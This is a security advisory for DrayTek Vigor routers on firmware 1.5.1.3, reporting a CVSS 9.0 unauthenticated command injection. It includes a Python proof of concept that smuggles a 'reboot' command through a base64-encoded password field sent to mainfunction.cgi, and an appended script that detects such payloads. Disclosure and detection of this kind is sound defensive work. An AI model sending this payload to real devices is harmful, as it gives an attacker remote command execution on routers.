Affected devices
Vigor2960, Vigor3900, Vigor300B
Affected firmware version
1.5.1.3
Founder
C0ss4ck @ Bytedance Wuheng Lab
Submit-time
2021-07-21
CVSS Score
AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H, 9.0
PoC
from sys import argv
from base64 import b64encode

import requests

# Login form fields; the username and password are sent base64-encoded.
data = {
    "URL": "192.168.1.1",
    "HOST": "http://192.168.1.1",
    "action": "authuser",
    "formusername": b64encode(b"admin").decode(),
    # The decoded password closes the quoted argument and appends a command.
    "formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
    "PHONENUMBER": argv[1]
}

header = {
    "Content-Type": "application/raw"
}

url = {
    "root": "http://192.168.1.1:80",
    "cgi": {
        "root": "/cgi-bin",
        "uri": {
            "mf": "/mainfunction.cgi",
        }
    }
}


def build_url(p1, p2=None):
    # Join the device root, the CGI directory and the endpoint name.
    if p2:
        return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
    else:
        return url["root"] + url[p1]


session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)
Details
Fix
DrayTek should publish a new firmware version.
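Until fixed firmware is installed, requests shaped like the PoC above can be flagged in front of the device or during log review. The following is an added example, not part of the original advisory or of DrayTek's code: it decodes the base64 login fields of an `authuser` POST to `mainfunction.cgi` and reports shell metacharacters. It assumes the captured body is form-encoded (which is what `requests` sends for `data=`); the function names and the benign sample password are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Characters that let a value break out of a quoted shell argument.
SHELL_META = re.compile(r"['\"`;&|$<>\\\n\r]")
CHECKED_FIELDS = ("formusername", "formpassword")


def decode_field(value):
    """Return the base64-decoded text, or None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_login(path, body):
    """Return a list of (field, reason) findings for one POST body."""
    findings = []
    if not path.endswith("/mainfunction.cgi"):
        return findings
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "authuser":
        return findings
    for field in CHECKED_FIELDS:
        for raw in params.get(field, []):
            text = decode_field(raw)
            if text is None:
                findings.append((field, "not valid base64"))
            elif SHELL_META.search(text):
                findings.append((field, "shell metacharacter in decoded value"))
    return findings


def sample_body(user, password):
    """Constructed sample: a form body with the same fields as the PoC."""
    def b64(s):
        return base64.b64encode(s.encode()).decode()
    return urlencode({"action": "authuser",
                      "formusername": b64(user),
                      "formpassword": b64(password)})


if __name__ == "__main__":
    for pw in ("Correct-Horse-9", "admin'&&reboot&&echo '"):
        print(pw, inspect_login("/cgi-bin/mainfunction.cgi", sample_body("admin", pw)))
```

A finding is a reason to drop or alert on the request; it does not replace restricting access to the management interface or updating the firmware.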